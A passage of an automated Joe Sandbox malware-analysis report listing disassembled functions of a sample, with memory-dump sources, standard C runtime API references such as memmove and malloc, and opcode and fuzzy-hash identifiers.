                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60E13B33D287CE95E213AB3794811B9F390EF6EB84F4C8732ED88761A1DF2975819650
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: powf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3445610689-0
                                                                                                                                                                                                              • Opcode ID: 5ad30e689d58035035cf876542b3713dd153f0ba22340c1bec9f0be17bf80339
                                                                                                                                                                                                              • Instruction ID: 524bb5be86d97b10c26868afe01ad3f89840e21f31e00ef757730f210473de97
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ad30e689d58035035cf876542b3713dd153f0ba22340c1bec9f0be17bf80339
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9E13922D2CACF91E213A73754821F9F390AF6E784F5C9B32EDD8391B5DB2871819550
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: powf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3445610689-0
                                                                                                                                                                                                              • Opcode ID: 02ebec0a491480fd2057fd44062463bac77995b48daa91f542a9f8e040063f10
                                                                                                                                                                                                              • Instruction ID: c659a6c881426b1fd6cf8458cccdf040eb7971a5701bc61e0efb5fe216a911e9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 02ebec0a491480fd2057fd44062463bac77995b48daa91f542a9f8e040063f10
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79E12C23C1DACB55E213A63754822F9F390AFAF7C4F589732ED88351B2EF2975819610
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                              • Opcode ID: 95c49b99967c6e3d69156b927d6db844ea5eb24aa15948f459adb9f9028cbabf
                                                                                                                                                                                                              • Instruction ID: 44b82ca264369f2bca4865076923284ca19208caef583c77302c326846b9cd40
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95c49b99967c6e3d69156b927d6db844ea5eb24aa15948f459adb9f9028cbabf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98115E21B2B683A1FE9AAF61E4A0335A3A0FF45F44F889435CD0D573A1DF2CA541A370
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memchr
                                                                                                                                                                                                              • String ID: %*s%.*s$ %.*s$--------------------------------
                                                                                                                                                                                                              • API String ID: 3297308162-2326682469
                                                                                                                                                                                                              • Opcode ID: d17309ed0d59613456a8cf04294e59ee2291ed6a710ef283f0996b4cad43e374
                                                                                                                                                                                                              • Instruction ID: e58e83e0c7c18bfae491afebbc68ff821aaf46b8f18b3ae3a0a3c07ddd12d7e3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d17309ed0d59613456a8cf04294e59ee2291ed6a710ef283f0996b4cad43e374
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B0E1D232E18AC695E711DB39D0447FCB3A0EF59B88F458332DA9C67295EF38A085D790
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_exception_destroy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2138705365-0
                                                                                                                                                                                                              • Opcode ID: 1a6c08c575c3cc95ddab942e36961008a2ad0e7c235e8f7b66f902669e15fa4d
                                                                                                                                                                                                              • Instruction ID: 4f95e039d2d6d285ea011d648f0ff108e2904606f0609e75ede3d000bad56038
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a6c08c575c3cc95ddab942e36961008a2ad0e7c235e8f7b66f902669e15fa4d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58817172A24A86A1EF04EF29E48436CA365FF44F88F908032D74D07A69EF79D8D5D350
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ceilffloorf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 300201839-0
                                                                                                                                                                                                              • Opcode ID: 8b4e1d49f591b999ae3730f2a0b2ac739865ba558a8604d369fa8af69be5c933
                                                                                                                                                                                                              • Instruction ID: e921904a358fd3daf504957f094e5434bf9cc4b8aebcae64d804b3eacd288131
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b4e1d49f591b999ae3730f2a0b2ac739865ba558a8604d369fa8af69be5c933
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53516D3392CBC295D3629F3290813B9F7A1BF69781F558332FE8866651EB3DD4918B10
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000004,?,00007FF735DD7251), ref: 00007FF735DE94C3
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000004,?,00007FF735DD7251), ref: 00007FF735DE9516
                                                                                                                                                                                                              • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000004,?,00007FF735DD7251), ref: 00007FF735DE9520
                                                                                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF735DE956C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2016347663-0
                                                                                                                                                                                                              • Opcode ID: 6b14a02f9084079f21f4a33f5c18dcfae18d94854c32bffa1e674cbdfab12def
                                                                                                                                                                                                              • Instruction ID: 207b7a8eb62c0ca5210ecfafe4b831c27d3253c4727c9c95485acffd264eba96
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b14a02f9084079f21f4a33f5c18dcfae18d94854c32bffa1e674cbdfab12def
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4841D262B26A43A1ED08EB12D18416DA3A5BB44FE4FD40731DAAE07BD5EE3CE042D314
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00007FF735DD29C8), ref: 00007FF735DE9E51
                                                                                                                                                                                                              • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00007FF735DD29C8), ref: 00007FF735DE9E64
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00007FF735DD29C8), ref: 00007FF735DE9ED7
                                                                                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF735DE9EE4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2016347663-0
                                                                                                                                                                                                              • Opcode ID: b4e5dcf9bbaa2da0ca61442f2c984441d3c742ad44e5023f288c26c16b7fe9ec
                                                                                                                                                                                                              • Instruction ID: ed1d1cd69333515c6c16a9049484899888ef8c91c4ca016fa6b379f0cce2e44f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b4e5dcf9bbaa2da0ca61442f2c984441d3c742ad44e5023f288c26c16b7fe9ec
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E41C262B26A86A1DE18EB25D4841ADA360FB44FE4F948635DFAE03BD5CF3CD091D310
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2075926362-0
                                                                                                                                                                                                              • Opcode ID: b75639982e846283ec09fd2c8f3aad16a82e906a195eb7df05b07a5eadfa8034
                                                                                                                                                                                                              • Instruction ID: c6ff7df5d5a5fee4487d78cdebcd4b91617989d18027729eba885ad590935217
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b75639982e846283ec09fd2c8f3aad16a82e906a195eb7df05b07a5eadfa8034
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92312862B25683A8FE59BB51E58037992409F00FE4F944131DE2C077C6DE3CE4C2E360
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2016347663-0
                                                                                                                                                                                                              • Opcode ID: 77db6f5e9dab869273bffbdb3067fbaef088ace00bc2dd171ac2ec695c9b60b4
                                                                                                                                                                                                              • Instruction ID: b8f3f6b737efd36bddf8d94d33978cb4082addfb52eedd558830929d8b4bc950
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 77db6f5e9dab869273bffbdb3067fbaef088ace00bc2dd171ac2ec695c9b60b4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B312B6172A78365EE18BB11A58436CE361EB05FD4F940236DE9E0B7D5DE7CD041E310
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memmove
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2162964266-0
                                                                                                                                                                                                              • Opcode ID: 3b41094913166419721b5d3703f2a1879ec4bc7bfded373dbb1bebc4dcf74de4
                                                                                                                                                                                                              • Instruction ID: 321bb6c571ce87c4dff8d2aebb494691333a6c9de69f2811d59dbf59f1578fc6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b41094913166419721b5d3703f2a1879ec4bc7bfded373dbb1bebc4dcf74de4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0310723B1679355FE1ABB65A5803B8A1A09F04FE5FA40231DE6D077D2DE3C94D3A360
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memmove.VCRUNTIME140(?,?,00000000,00000004,?,00007FF735DD7251), ref: 00007FF735DE934C
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00000004,?,00007FF735DD7251), ref: 00007FF735DE9380
                                                                                                                                                                                                              • memmove.VCRUNTIME140(?,?,00000000,00000004,?,00007FF735DD7251), ref: 00007FF735DE938A
                                                                                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF735DE93B3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2016347663-0
                                                                                                                                                                                                              • Opcode ID: 0da6c697e664dd0c3cd347215f750e3f4412869c381216c1578f5e4f52714d98
                                                                                                                                                                                                              • Instruction ID: 8ca64b66e12292d1fe75b74a1bb26d099a5267e2936855d150c9ffacac7bf882
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0da6c697e664dd0c3cd347215f750e3f4412869c381216c1578f5e4f52714d98
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF31C562B2A743A5EE28BB1191842ACE361EB44FD4F944631DEAE077D5DE3CE481D320
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memmove.VCRUNTIME140(00000000,?,?,00007FF735DD2701), ref: 00007FF735DE76EA
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,00007FF735DD2701), ref: 00007FF735DE7770
                                                                                                                                                                                                              • memmove.VCRUNTIME140(00000000,?,?,00007FF735DD2701), ref: 00007FF735DE7796
                                                                                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF735DE77BA
                                                                                                                                                                                                                • Part of subcall function 00007FF735DEAF64: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF735DE9935,?,?,?,?,?,00007FF735DE7EA5), ref: 00007FF735DEAF7E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2075926362-0
                                                                                                                                                                                                              • Opcode ID: 2820beabf59c581c718824bc53ac5742c9041f054aa57f5d0723a468caef3a6d
                                                                                                                                                                                                              • Instruction ID: d561ced6d56e7677bf73fd82db461ee9d1d671ca9fdefe8e9016597bbe179012
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2820beabf59c581c718824bc53ac5742c9041f054aa57f5d0723a468caef3a6d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B31B422A29783A1ED58BB11A580278A291EF05FF4F944B34DE7D077D0DF7CE4929360
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memmove$Concurrency::cancel_current_task
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1247048853-0
